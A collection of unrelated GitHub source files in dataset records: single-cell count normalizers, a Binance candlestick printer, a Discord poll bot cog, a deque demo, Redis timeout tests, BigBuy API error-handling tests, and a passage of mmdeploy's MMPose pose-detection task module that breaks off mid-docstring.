{"seq_id":"29452477760","text":"import numpy as np\nfrom scipy.sparse import issparse\nfrom sklearn.base import TransformerMixin, BaseEstimator\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.preprocessing import normalize\n\n\nclass PearsonResidualsNormalizer(TransformerMixin, BaseEstimator):\n \"\"\"\n Applies analytic Pearson residual normalization.\n The residuals are based on a negative binomial offset model with overdispersion\n `theta` shared across genes. 
By default, residuals are clipped to `sqrt(n_obs)`\n and overdispersion `theta=100` is used.\n\n Adapted from the scanpy implementation.\n \"\"\"\n\n def __init__(self, theta=100, clip=None):\n assert (theta > 0) # overdispersion must be positive\n assert (clip is None or clip >= 0)\n self.theta = theta\n self.clip = clip\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n\n scdata = np.array(X, dtype=int) # cast to numpy array\n mask = scdata.sum(axis=0) > 0 # ignore all 0 columns\n X = scdata[:, mask]\n\n # prepare clipping\n if self.clip is None:\n n = X.shape[0]\n clip = np.sqrt(n)\n else:\n clip = self.clip\n\n if issparse(X):\n\n sums_genes = np.sum(X, axis=0)\n sums_cells = np.sum(X, axis=1)\n sum_total = np.sum(sums_genes).squeeze()\n else:\n sums_genes = np.sum(X, axis=0, keepdims=True)\n sums_cells = np.sum(X, axis=1, keepdims=True)\n sum_total = np.sum(sums_genes)\n\n mu = np.array(sums_cells @ sums_genes / sum_total)\n diff = np.array(X - mu)\n residuals = diff / np.sqrt(mu + mu ** 2 / self.theta)\n\n # clip\n scdata[:, mask] = np.clip(residuals, a_min=-clip, a_max=clip)\n return scdata\n\n def fit_transform(self, X, y=None, **fit_params):\n return self.transform(X, y)\n\n\nclass TMMNormalizer(TransformerMixin, BaseEstimator):\n \"\"\"\n Applies TMM normalization like in the edgeR package.\n\n To compute scale factors, a reference sample is chosen as the one nearest to the specified\n percentile of the data (ref_percentile param). A gene-wise log-fold-change matrix (M) and\n absolute expression levels (A) are computed and mean-trimmed according to the trim_m and trim_a params.\n\n If seq_depth is set to True, a sequencing depth normalization is also done. The total number of reads\n per sample is set to the median of the sequencing depth of the train set.\n\n Based on the conorm implementation, but designed to scale with data size (the conorm implementation\n can't handle large datasets).\n \"\"\"\n\n def __init__(self, trim_m=.3, trim_a=.05, ref_percentile=75, seq_depth=True):\n self.trim_m = trim_m\n self.trim_a = trim_a\n self.ref_percentile = ref_percentile\n self.scale_factor = None\n self.total_counts = None\n\n def fit_transform(self, X, y=None, **fit_params):\n self.fit(X, y)\n return self.transform(X, y)\n\n def fit(self, X, y=None):\n self.total_counts = np.median(np.sum(X,axis=1))\n self.scale_factor = self.__compute_scale_factors(X).reshape(-1,1)\n return self\n\n def transform(self, X, y=None):\n X = normalize(X, norm='l1') * self.total_counts\n X /= self.scale_factor\n return X\n\n def __compute_scale_factors(self, readcounts):\n \"\"\"\n compute scale factors\n :param readcounts: expression matrix of shape (n_sample,n_genes)\n :return: ndarray of shape (n_sample,1) with the scale factors of each sample\n \"\"\"\n\n def scale_factor(x, ref):\n \"\"\"\n compute the scale factor for a sample\n :param x: sample\n :param ref: reference sample\n :return: scale factor for the sample\n \"\"\"\n vsize = x.shape[0] // 2\n mask = x[vsize:].astype(bool)\n x = x[:vsize]\n\n norm_x = x / np.nansum(x)\n norm_ref = ref / np.nansum(ref)\n log_sample = np.log2(norm_x)\n log_ref = np.log2(ref)\n m = log_sample - log_ref\n a = (log_sample + log_ref) / 2\n\n perc_m = np.nanquantile(m, [self.trim_m, 1 - self.trim_m], method='nearest')\n perc_a = np.nanquantile(a, [self.trim_a, 1 - self.trim_a], method='nearest')\n\n mask |= (m < perc_m[0]) | (m > perc_m[1])\n mask |= (a < perc_a[0]) | (a > perc_a[1])\n\n w = ((1 - norm_x) / x) + ((1 - norm_ref) / ref)\n w = 1 / w\n\n w[mask] = 0\n m[mask] = 0\n w /= w.sum()\n
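# the genes trimmed above carry zero weight; the value returned below is the\n # weighted mean of M-values, with weights ~ inverse approximate variances\n # of the log-ratios, as in edgeR's TMM\n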
return np.sum(w * m)\n\n readcounts = np.array(readcounts, dtype=float)\n q_expr = np.apply_along_axis(lambda x: np.percentile(x[np.any(x != 0)], self.ref_percentile),\n axis=1, arr=readcounts)\n iref = np.argmin(np.abs(q_expr - q_expr.mean()))\n refsample = readcounts[iref, :]\n\n f = readcounts == 0\n f[:, f[iref]] = True\n readcounts[f] = np.nan\n\n funcin = np.concatenate((readcounts, f), axis=1)\n sf = np.apply_along_axis(lambda x: scale_factor(x, refsample), axis=1, arr=funcin)\n sf -= sf.mean()\n return np.exp2(sf)\n\n\nclass SequencingDepthNormalizer(TransformerMixin, BaseEstimator):\n \"\"\"\n Sequencing depth normalization.\n The 'total' parameter can be used to set the total number of counts per sample\n in the transformed matrix. The default is 1e6, which is equal to a CPM normalization.\n If total is set to 'mean' or 'median', it will be estimated on the train set in the\n fit function.\n A log transformation can also be done if log=True.\n \"\"\"\n def __init__(self, total=1e6, log=False):\n self.total = total\n self.log = log\n\n def fit(self, X, y=None):\n if self.total == 'mean':\n self.total = np.sum(X, axis=1).mean()\n elif self.total == 'median':\n self.total = np.median(np.sum(X, axis=1))\n return self\n\n def transform(self, X, y=None):\n X = normalize(X, norm='l1') * self.total\n if self.log:\n return np.log(X + 1)\n return X\n\n def fit_transform(self, X, y=None, **fit_params):\n self.fit(X, y)\n return self.transform(X, y)\n\n\nclass GfIcfNormalizer(TransformerMixin, BaseEstimator):\n \"\"\"\n Applies a gene-frequency inverse-cell-frequency normalization.\n It's basically just a wrapper for vanilla sklearn's tfidf transformer,\n but the output is converted to a dense ndarray for easy integration with\n pipelines.\n \"\"\"\n def __init__(self):\n self.tfidf = TfidfTransformer()\n\n def fit(self, X, y=None):\n self.tfidf.fit(X)\n return self\n\n def transform(self, X, y=None):\n return self.tfidf.transform(X).toarray()\n\n def fit_transform(self, X, y=None, **fit_params):\n return self.tfidf.fit_transform(X).toarray()\n","repo_name":"j3rk0/sc-learn","sub_path":"sclearn/normalization.py","file_name":"normalization.py","file_ext":"py","file_size_in_byte":6883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"11547393915","text":"#!/usr/bin/env python3\nfrom datetime import datetime\nimport requests\nimport statistics\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n RED = '\\033[31m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nclass apiCall:\n def __init__(self, arg1, arg2, limit):\n\n url = 'https://api.binance.com/api/v1/klines'\n url2= 'https://api.binance.com/api/v1/exchangeInfo'\n\n params = {\n 'symbol': arg1,\n 'interval': arg2,\n 'limit': limit\n }\n\n response = requests.Session().get(url, params=params)\n\n self.response = response\n self.statusCode = response.status_code\n self.usage1m = response.headers['x-mbx-used-weight-1m']\n self.usage = response.headers['x-mbx-used-weight']\n self.exchange_info = 0 #requests.get(url2).json()\n self.data=response.json()\n\n# This function returns an object of apiCall\ndef api(arg1, arg2, limit):\n return apiCall(arg1, arg2, limit)\n\n\ndef stop_on_api_limit(arg1):\n #test\n # api_call['response'].headers['x-mbx-used-weight']=1200\n if (int(arg1.headers['x-mbx-used-weight'])>1100):\n print('You exceeded the Binance API used-weight limit')\n
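# Binance budgets request weight at 1200 per rolling minute (cf. the\n # commented-out test value above); stopping at 1100 leaves some headroom\n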
exit()\ndef output_data(data, limit, r, arg1, arg2, scale):\r\n oc_red=[]\r\n oc_green=[]\r\n for dic in data[-limit:]:\r\n print(\"\")\r\n # adjustutc=3600000\r\n adjustutc=0\r\n print(datetime.utcfromtimestamp((dic[0]+adjustutc)/1000).strftime('%Y-%m-%d %H:%M %a'),arg2, end=\" | \")\r\n\r\n h=round(float(dic[2]),r)\r\n o=round(float(dic[1]),r)\r\n c=round(float(dic[4]),r)\r\n l=round(float(dic[3]),r)\r\n v=round(float(dic[5])/1,r)\r\n t=round(int(dic[8])/1 ,r) #number of trades\r\n\r\n col_width=1\r\n\r\n # OHLC\r\n # space_print(h, arg1, scale)\r\n if ( o>c ):\r\n space_print(o, arg1, scale, r, bcolors.RED )\r\n # space_print(c, arg1, scale, bcolors.RED)\r\n else:\r\n space_print(o, arg1, scale, r )\r\n # space_print(c, arg1, scale )\r\n # space_print(l, arg1, scale)\r\n\r\n #CALCULATED FIELDS\r\n\r\n # #close-open\r\n # space_print(c-o, arg1, scale)\r\n # #high-open\r\n # space_print(h-o, arg1, scale)\r\n # #high-open\r\n # space_print(l-o, arg1, scale)\r\n\r\n #high-low\r\n # space_print(round(h-l,r), arg1, scale)\r\n #sum of c-o\r\n # oc+=c-o\r\n # space_print(oc, arg1, scale)\r\n\r\n # Candle- body, uptail, downtail\r\n # uptail\r\n if c-o<0:\r\n uptail=o-h\r\n else:\r\n uptail=c-h\r\n #downtail\r\n if c-o<0:\r\n downtail=c-l\r\n else:\r\n downtail=o-l\r\n\r\n space_print(uptail, arg1, scale, r)\r\n space_print(c-o, arg1, scale, r)\r\n space_print(downtail, arg1, scale, r)\r\n\r\n\r\n #Median\r\n if c-o<0:\r\n oc_red.append(c-o)\r\n else:\r\n oc_green.append(c-o)\r\n\r\n # #hammers\r\n # if c-o<0:\r\n # if abs(c-o)*2 < abs(c-l) :\r\n # space_print(10 , arg1, scale)\r\n # else:\r\n # if abs(c-o)*2 < abs(o-h) :\r\n # statistics.mean raises on an empty list, so guard both averages\r\n if len(oc_red)>0:\r\n print(\"Avg red candle c-o=\", round((statistics.mean(oc_red)),2), end=\" \" )\r\n if len(oc_green)>0:\r\n print(\"Avg green candle c-o=\", round((statistics.mean(oc_green)),2), end=\"\")\r\n print(\"red/green=\", (len(oc_green)/(len(oc_green)+len(oc_red))) , end = \" \")\r\n\r\ndef space_print(x, arg1, scale, r, color=bcolors.OKCYAN):\r\n\r\n adjust=10\r\n # if(o>c):\r\n #\r\n if(x<0):\r\n cs=bcolors.RED\r\n ce=bcolors.ENDC\r\n else:\r\n cs=color\r\n ce=bcolors.ENDC\r\n\r\n if(arg1==\"BTCUSDT\"):\r\n adjust=7\r\n x=str(int(x*scale))\r\n else:\r\n x=round(x*scale,r)\r\n x=str(x)\r\n\r\n print(cs+x.ljust(adjust,\" \")+ce, end=\"\")\r\n","repo_name":"Migacz85/dotfiles","sub_path":".scripts/crypto/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"16911243212","text":"import discord\nfrom discord.ext import commands\nimport asyncio\nfrom discord import abc\nfrom discord.abc import Messageable\nfrom discord.colour import Colour\n\nclass Community(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self._last_member = None\n\n @commands.command(help= \"Creates a poll which lasts a minute\", aliases=[\"voting\", \"poll\"])\n async def vote(self, ctx, *, arg):\n vote = discord.Embed(title=arg)\n poll = await ctx.send(embed=vote)\n pollid = poll.id\n await poll.add_reaction(\"👍\")\n await poll.add_reaction(\"👎\")\n await asyncio.sleep(60)\n finalpoll = await ctx.fetch_message(id=pollid)\n reacts = finalpoll.reactions\n numyes = 0\n numno = 0\n nummisc = 0\n for react in reacts:\n if react.emoji == \"👍\":\n numyes = react.count - 1\n elif react.emoji == \"👎\":\n numno = react.count - 1\n else:\n nummisc += react.count\n\n await poll.delete()\n rex = \"Results- \"\n # plain comparisons: green embed if \"yes\" wins, red if \"no\" wins, blue on a tie\n if numyes > numno:\n results = discord.Embed(title=rex + arg, color=0x008000)\n elif numno > numyes:\n results = discord.Embed(title=rex + arg, color=0xFF0000)\n else:\n results = discord.Embed(title=rex + arg, color=0x0000FF)\n results.add_field(name=\"Yes: \", 
value=numyes)\n results.add_field(name=\"No: \", value=numno)\n if nummisc != 0:\n results.add_field(name=\"Misc. Reactions\", value=nummisc)\n await ctx.send(embed=results)\n \ndef setup(bot):\n bot.add_cog(Community(bot))","repo_name":"SushiInYourFace/SushiBoi","sub_path":"Discord Bot/cogs/cmty.py","file_name":"cmty.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40467096978","text":"from collections import deque\n\nl = [0,1,2,3,4,5,6,7,8,9]\nl = list(range(10))\nprint('l = %s' % l)\n\n\nq = deque(l,10)\nq.append(11)\nprint(q)\nq.appendleft(12)\nprint(q) \n\nq.pop()\nprint(q)\nq.popleft()\nprint(q)","repo_name":"xusheng2017/python_learning","sub_path":"inline_func/my_deque.py","file_name":"my_deque.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26526336067","text":"from django.conf import settings\nfrom django.test import TestCase\nfrom fakeredis import FakeRedis\nfrom bamboo_engine import states as bamboo_engine_states\n\nfrom gcloud.taskflow3.models import TimeoutNodeConfig\nfrom gcloud.taskflow3.signals.handlers import _node_timeout_info_update\n\n\nclass NodeTimeoutInfoUpdateTestCase(TestCase):\n def setUp(self):\n self.node_id = \"node_id\"\n self.version = \"version\"\n self.redis_inst = FakeRedis()\n self.time_config = TimeoutNodeConfig.objects.create(\n task_id=1, root_pipeline_id=\"root_pipeline_id\", action=\"forced_fail\", node_id=self.node_id, timeout=5\n )\n\n def test__node_timeout_info_update_running_state(self):\n to_state = bamboo_engine_states.RUNNING\n _node_timeout_info_update(self.redis_inst, to_state, self.node_id, self.version)\n self.assertEqual(self.redis_inst.zcard(settings.EXECUTING_NODE_POOL), 1)\n another_version = \"version2\"\n _node_timeout_info_update(self.redis_inst, to_state, self.node_id, another_version)\n self.assertEqual(self.redis_inst.zcard(settings.EXECUTING_NODE_POOL), 2)\n\n def test__node_timeout_info_update_finish_state(self):\n to_state = bamboo_engine_states.RUNNING\n _node_timeout_info_update(self.redis_inst, to_state, self.node_id, self.version)\n to_state = bamboo_engine_states.FINISHED\n _node_timeout_info_update(self.redis_inst, to_state, self.node_id, self.version)\n self.assertEqual(self.redis_inst.zcard(settings.EXECUTING_NODE_POOL), 0)\n\n def test__node_timeout_info_update_fail_state(self):\n to_state = bamboo_engine_states.RUNNING\n _node_timeout_info_update(self.redis_inst, to_state, self.node_id, self.version)\n to_state = bamboo_engine_states.FAILED\n _node_timeout_info_update(self.redis_inst, to_state, self.node_id, self.version)\n self.assertEqual(self.redis_inst.zcard(settings.EXECUTING_NODE_POOL), 0)\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"gcloud/tests/taskflow3/signals/handlers/test__node_timeout_info_update.py","file_name":"test__node_timeout_info_update.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"4258309048","text":"import json\n\nimport pytest\nfrom requests import Response\n\nfrom bigbuy import exceptions as ex\n\n\ndef test_json_or_none():\n assert ex.json_or_none(\"\") is None\n assert ex.json_or_none(\"null\") is None\n\n\ndef test_trim_empty_collections():\n assert not ex._trim_empty_collections({\n 'a': {'b': [{'c': {'d': []}}, {}, []]},\n })\n\n\ndef 
test_flat_children_errors():\n assert not ex.flat_children_errors({\n 'a': {'children': [{'children': {'b': []}}]},\n })\n\n assert \\\n {'shippingAddress.lastName': ['This value is too long.']} \\\n == \\\n ex.flat_children_errors({\n 'internalReference': [],\n 'cashOnDelivery': [],\n 'language': [],\n 'paymentMethod': [],\n 'shippingAddress': {\n 'children': {\n 'firstName': [],\n 'lastName': {\n 'errors': ['This value is too long.']},\n 'country': [],\n 'postcode': [],\n 'town': [],\n 'comment': [],\n 'vatNumber': [],\n 'companyName': []\n }\n },\n 'carriers': {\n 'children': [\n {\n 'children': {'id': [], 'name': []}\n }\n ]\n }\n })\n\n\n@pytest.fixture()\ndef error_payload():\n return {\n \"code\": 400,\n \"message\": \"ERROR: This value is not valid.\\\\n\",\n \"errors\": {\n \"errors\": [\"This value is not valid.\"],\n \"children\": {\n \"internalReference\": [], \"cashOnDelivery\": [],\n \"language\": [], \"paymentMethod\": [],\n \"shippingAddress\": {\"children\": {\"firstName\": [], \"lastName\": [],\n \"country\": [], \"postcode\": [], \"town\": [],\n \"address\": [], \"phone\": [], \"email\": [], \"comment\": [],\n \"vatNumber\": [],\n \"companyName\": []}},\n \"carriers\": [], \"products\": [], \"dateAdd\": [],\n }\n }\n }\n\n\ndef test_raise_for_response_products_error():\n response = Response()\n response.encoding = \"utf-8\"\n response.status_code = 409\n # Sentry BIXOTO-PZ\n payload = {\n \"code\": 409,\n \"message\": '{\"info\":\"Products error.\",\"data\":[{\"sku\":\"S5001344\",\"message\":\"Inactive product.\"}]}'\n }\n response._content = json.dumps(payload).encode(\"utf-8\")\n\n with pytest.raises(ex.BBProductError, match=\"Products error:\"):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_error_detail():\n warehouses = [\n {\"id\": 1, \"references\": [\"59430878\", \"V0700822\"]},\n {\"id\": 3, \"references\": [\"S7106391\"]}\n ]\n\n response = Response()\n response.encoding = \"utf-8\"\n response.status_code = 409\n payload = {\n \"code\": 409,\n \"message\": \"This cart contains products from different warehouses. You must send separate requests for each set of product references to obtain the shipping costs for each set of products. You can find more info in the field \\\"error_detail\\\" in this response\",\n \"error_detail\": {\"warehouses\": warehouses}\n }\n response._content = json.dumps(payload).encode(\"utf-8\")\n\n with pytest.raises(ex.BBWarehouseSplitError) as exc_info:\n ex.raise_for_response(response)\n\n assert isinstance(exc_info.value, ex.BBWarehouseSplitError)\n assert exc_info.value.warehouses == warehouses\n\n\ndef test_raise_for_response_invalid_value_error(error_payload):\n response = Response()\n response.encoding = \"utf-8\"\n response._content = json.dumps(error_payload).encode(\"utf-8\")\n response.status_code = 400\n\n with pytest.raises(ex.BBValidationError):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_too_long_value_error(error_payload):\n response = Response()\n response.encoding = \"utf-8\"\n error_payload[\"message\"] = (\"shippingAddress:\\\\n address:\\\\n ERROR: This value is too long.\"\n \" It should have 70 characters or less.\\\\n\")\n error_payload[\"errors\"][\"children\"][\"shippingAddress\"][\"children\"][\"address\"] = \\\n {\"errors\": [\"This value is too long. 
It should have 70 characters or less.\"]}\n\n response._content = json.dumps(error_payload).encode(\"utf-8\")\n response.status_code = 400\n\n with pytest.raises(ex.BBValidationError):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_soft_409():\n response = Response()\n response.status_code = 200\n response.encoding = \"utf-8\"\n payload = {'code': 409, 'message': 'Something went wrong 56783360c34fff84fe56880fbf62179b'}\n response._content = json.dumps(payload).encode(\"utf-8\")\n\n with pytest.raises(ex.BBResponseError, match=\"Something went wrong\"):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_soft_error_headers_in_body():\n \"\"\"\n This test reproduces this real-world error we got on 2022/05/24:\n\n $ curl -iH 'Authorization: Bearer OWZ...Nw' \\\n https://api.bigbuy.eu/rest/shipping/lowest-shipping-costs-by-country/ES\n\n HTTP/2 200\n ...\n content-length: 221\n\n HTTP/1.0 500 Internal Server Error\n Cache-Control: no-cache, private\n Content-Type: application/json\n Date: Tue, 24 May 2022 15:01:07 GMT\n\n {\"error\":\"Information is not available right now. Try it again later\"}\n\n Note how this is a 200 response but whose body contains headers for a 500 error.\n \"\"\"\n\n response = Response()\n response.status_code = 200\n response.encoding = \"utf-8\"\n response._content = (\n 'HTTP/1.0 500 Internal Server Error\\r\\nCache-Control: no-cache, private\\r\\nContent-Type: application/json\\r\\n'\n 'Date: Tue, 24 May 2022 15:41:45 GMT\\r\\n\\r\\n{\"error\":\"Information is not available right now. Try it '\n 'again later\"}'\n ).encode(\"utf-8\")\n\n with pytest.raises(ex.BBServerError, match=\"not available right now\"):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_500_html_body():\n response = Response()\n response.status_code = 500\n response.encoding = \"utf-8\"\n response._content = (\n '<html>\\n<head>\\n <meta charset=\"utf-8\"/>\\n <title>An Error Occurred: Internal Server Error</title>\\n</head>\\n<body>\\n<h1>...</h1>\\n</body>\\n</html>\\n'\n ).encode(\"utf-8\")\n\n with pytest.raises(ex.BBServerError, match=\"^<html>\"):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_504_html_body():\n response = Response()\n response.status_code = 504\n response.encoding = \"utf-8\"\n response._content = (\n \"<html><body><h1>504 Gateway Time-out</h1></body></html>\\nThe server didn't respond in time.\\n\"\n ).encode(\"utf-8\")\n\n with pytest.raises(ex.BBTimeoutError, match=r\"^The server didn't respond in time\\.\"):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_500_html_body_container_div():\n response = Response()\n response.status_code = 500\n response.encoding = \"utf-8\"\n response._content = \"\"\"\n<div class=\"container\">\n <h1>Oops! An Error Occurred</h1>\n <h2>The server returned a \"500 Internal Server Error\".</h2>\n <p>\n Something is broken. Please let us know what you were doing when this error occurred.\n We will fix it as soon as possible. Sorry for any inconvenience caused.\n </p>\n</div>
\n \"\"\".encode(\"utf-8\")\n\n with pytest.raises(ex.BBServerError, match=r\"^Something is broken\\.\"):\n ex.raise_for_response(response)","repo_name":"Bixoto/PyBigBuy","sub_path":"tests/test_exceptions.py","file_name":"test_exceptions.py","file_ext":"py","file_size_in_byte":8165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13920589921","text":"import copy\nimport os\nfrom collections import defaultdict\nfrom typing import Callable, Dict, Optional, Sequence, Tuple, Union\n\nimport mmcv\nimport mmengine\nimport numpy as np\nimport torch\nfrom mmengine.model import BaseDataPreprocessor\nfrom mmengine.registry import Registry\n\nfrom mmdeploy.codebase.base import CODEBASE, BaseTask, MMCodebase\nfrom mmdeploy.utils import (Codebase, Task, get_codebase_config,\n get_input_shape, get_root_logger)\n\n\ndef process_model_config(\n model_cfg: mmengine.Config,\n imgs: Union[Sequence[str], Sequence[np.ndarray]],\n input_shape: Optional[Sequence[int]] = None,\n):\n \"\"\"Process the model config for sdk model.\n\n Args:\n model_cfg (mmengine.Config): The model config.\n imgs (Sequence[str] | Sequence[np.ndarray]): Input image(s), accepted\n data type are List[str], List[np.ndarray].\n input_shape (list[int]): A list of two integer in (width, height)\n format specifying input shape. Default: None.\n\n Returns:\n mmengine.Config: the model config after processing.\n \"\"\"\n cfg = copy.deepcopy(model_cfg)\n test_pipeline = cfg.test_dataloader.dataset.pipeline\n data_preprocessor = cfg.model.data_preprocessor\n codec = cfg.codec\n if isinstance(codec, list):\n codec = codec[-1]\n input_size = codec['input_size'] if input_shape is None else input_shape\n test_pipeline[0] = dict(type='LoadImageFromFile')\n for i in reversed(range(len(test_pipeline))):\n trans = test_pipeline[i]\n if trans['type'] == 'PackPoseInputs':\n test_pipeline.pop(i)\n elif trans['type'] == 'GetBBoxCenterScale':\n trans['type'] = 'TopDownGetBboxCenterScale'\n trans['padding'] = 1.25 # default argument\n trans['image_size'] = input_size\n elif trans['type'] == 'TopdownAffine':\n trans['type'] = 'TopDownAffine'\n trans['image_size'] = input_size\n trans.pop('input_size')\n\n test_pipeline.append(\n dict(\n type='Normalize',\n mean=data_preprocessor.mean,\n std=data_preprocessor.std,\n to_rgb=data_preprocessor.get('bgr_to_rgb', False)))\n test_pipeline.append(dict(type='ImageToTensor', keys=['img']))\n test_pipeline.append(\n dict(\n type='Collect',\n keys=['img'],\n meta_keys=[\n 'img_shape', 'pad_shape', 'ori_shape', 'img_norm_cfg',\n 'scale_factor', 'bbox_score', 'center', 'scale'\n ]))\n\n cfg.test_dataloader.dataset.pipeline = test_pipeline\n return cfg\n\n\ndef _get_dataset_metainfo(model_cfg: mmengine.Config):\n \"\"\"Get metainfo of dataset.\n\n Args:\n model_cfg Config: Input model Config object.\n Returns:\n (list[str], list[np.ndarray]): Class names and palette\n \"\"\"\n from mmpose import datasets # noqa\n from mmpose.registry import DATASETS\n\n module_dict = DATASETS.module_dict\n\n for dataloader_name in [\n 'test_dataloader', 'val_dataloader', 'train_dataloader'\n ]:\n if dataloader_name not in model_cfg:\n continue\n dataloader_cfg = model_cfg[dataloader_name]\n dataset_cfg = dataloader_cfg.dataset\n dataset_mmpose = module_dict.get(dataset_cfg.type, None)\n if dataset_mmpose is None:\n continue\n if hasattr(dataset_mmpose, '_load_metainfo') and isinstance(\n dataset_mmpose._load_metainfo, Callable):\n meta = dataset_mmpose._load_metainfo(\n 
dataset_cfg.get('metainfo', None))\n if meta is not None:\n return meta\n if hasattr(dataset_mmpose, 'METAINFO'):\n return dataset_mmpose.METAINFO\n\n return None\n\n\nMMPOSE_TASK = Registry('mmpose_tasks')\n\n\n@CODEBASE.register_module(Codebase.MMPOSE.value)\nclass MMPose(MMCodebase):\n \"\"\"mmpose codebase class.\"\"\"\n task_registry = MMPOSE_TASK\n\n @classmethod\n def register_deploy_modules(cls):\n \"\"\"register rewritings.\"\"\"\n import mmdeploy.codebase.mmdet.models\n import mmdeploy.codebase.mmdet.ops\n import mmdeploy.codebase.mmdet.structures\n import mmdeploy.codebase.mmpose.models # noqa: F401\n\n @classmethod\n def register_all_modules(cls):\n \"\"\"register all modules from mmpose.\"\"\"\n from mmpose.utils.setup_env import register_all_modules\n\n cls.register_deploy_modules()\n register_all_modules(True)\n\n\n@MMPOSE_TASK.register_module(Task.POSE_DETECTION.value)\nclass PoseDetection(BaseTask):\n \"\"\"Pose detection task class.\n\n Args:\n model_cfg (mmengine.Config): Original PyTorch model config file.\n deploy_cfg (mmengine.Config): Deployment config file or loaded Config\n object.\n device (str): A string represents device type.\n \"\"\"\n\n def __init__(self, model_cfg: mmengine.Config, deploy_cfg: mmengine.Config,\n device: str):\n super().__init__(model_cfg, deploy_cfg, device)\n self.model_cfg.model.test_cfg['flip_test'] = False\n\n def build_backend_model(\n self,\n model_files: Sequence[str] = None,\n data_preprocessor_updater: Optional[Callable] = None,\n **kwargs) -> torch.nn.Module:\n \"\"\"build backend model.\n\n Args:\n model_files (Sequence[str]): Input model files. Default is None.\n data_preprocessor_updater (Callable | None): A function to update\n the data_preprocessor. Defaults to None.\n\n Returns:\n nn.Module: An initialized backend model.\n \"\"\"\n from .pose_detection_model import build_pose_detection_model\n data_preprocessor = self.model_cfg.model.data_preprocessor\n if data_preprocessor_updater is not None:\n data_preprocessor = data_preprocessor_updater(data_preprocessor)\n model = build_pose_detection_model(\n model_files,\n self.model_cfg,\n self.deploy_cfg,\n device=self.device,\n data_preprocessor=data_preprocessor,\n **kwargs)\n return model.eval().to(self.device)\n\n def create_input(self,\n imgs: Union[str, np.ndarray, Sequence],\n input_shape: Sequence[int] = None,\n data_preprocessor: Optional[BaseDataPreprocessor] = None,\n **kwargs) -> Tuple[Dict, torch.Tensor]:\n \"\"\"Create input for pose detection.\n\n Args:\n imgs (Any): Input image(s), accepted data type are ``str``,\n ``np.ndarray``.\n input_shape (list[int]): A list of two integer in (width, height)\n format specifying input shape. Defaults to ``None``.\n data_preprocessor (BaseDataPreprocessor | None): Input data pre-\n processor. 
Default is ``None``.\n\n Returns:\n tuple: (data, inputs), meta information for the input image\n and input.\n \"\"\"\n from mmcv.transforms import Compose\n from mmpose.registry import TRANSFORMS\n cfg = self.model_cfg\n if isinstance(imgs, (list, tuple)):\n if not isinstance(imgs[0], (np.ndarray, str)):\n raise AssertionError('imgs must be strings or numpy arrays')\n elif isinstance(imgs, (np.ndarray, str)):\n imgs = [imgs]\n img_path = [imgs]\n else:\n raise AssertionError('imgs must be strings or numpy arrays')\n if isinstance(imgs, (list, tuple)) and isinstance(imgs[0], str):\n img_path = imgs\n img_data = [mmcv.imread(img) for img in imgs]\n imgs = img_data\n person_results = []\n bboxes = []\n for img in imgs:\n height, width = img.shape[:2]\n # create dummy person results\n person_results.append([{'bbox': np.array([0, 0, width, height])}])\n bboxes.append(\n np.array([box['bbox'] for box in person_results[-1]]))\n # build the data pipeline\n test_pipeline = [\n TRANSFORMS.build(c) for c in cfg.test_dataloader.dataset.pipeline\n ]\n test_pipeline = Compose(test_pipeline)\n if input_shape is not None and hasattr(cfg, 'codec'):\n if isinstance(cfg.codec, dict):\n codec = cfg.codec\n elif isinstance(cfg.codec, list):\n codec = cfg.codec[0]\n else:\n raise TypeError(f'Unsupported type {type(cfg.codec)}')\n input_size = codec['input_size']\n if tuple(input_shape) != tuple(input_size):\n logger = get_root_logger()\n logger.warning(f'Input shape from deploy config is not '\n f'same as input_size in model config:'\n f'{input_shape} vs {input_size}')\n\n batch_data = defaultdict(list)\n meta_data = _get_dataset_metainfo(self.model_cfg)\n assert len(imgs) == len(bboxes) == len(person_results)\n for i in range(len(imgs)):\n for bbox in bboxes[i]:\n # prepare data\n bbox_score = np.array([bbox[4] if len(bbox) == 5 else 1\n ]) # shape (1,)\n data = {\n 'img':\n imgs[i],\n 'bbox_score':\n bbox_score,\n 'bbox': [] if hasattr(cfg.model, 'bbox_head')\n and cfg.model.bbox_head.type == 'YOLOXPoseHead' else\n bbox[None],\n 'img_path':\n img_path[i]\n }\n data.update(meta_data)\n data = test_pipeline(data)\n data['inputs'] = data['inputs'].to(self.device)\n batch_data['inputs'].append(data['inputs'])\n batch_data['data_samples'].append(data['data_samples'])\n\n if data_preprocessor is not None:\n batch_data = data_preprocessor(batch_data, False)\n input_tensor = batch_data['inputs']\n return batch_data, input_tensor\n\n def visualize(self,\n image: Union[str, np.ndarray],\n result: list,\n output_file: str,\n window_name: str,\n show_result: bool = False,\n **kwargs):\n \"\"\"Visualize predictions of a model.\n\n Args:\n image (str | np.ndarray): Input image to draw predictions on.\n result (list): A list of predictions.\n output_file (str): Output file to save drawn image.\n window_name (str): The name of visualization window. 
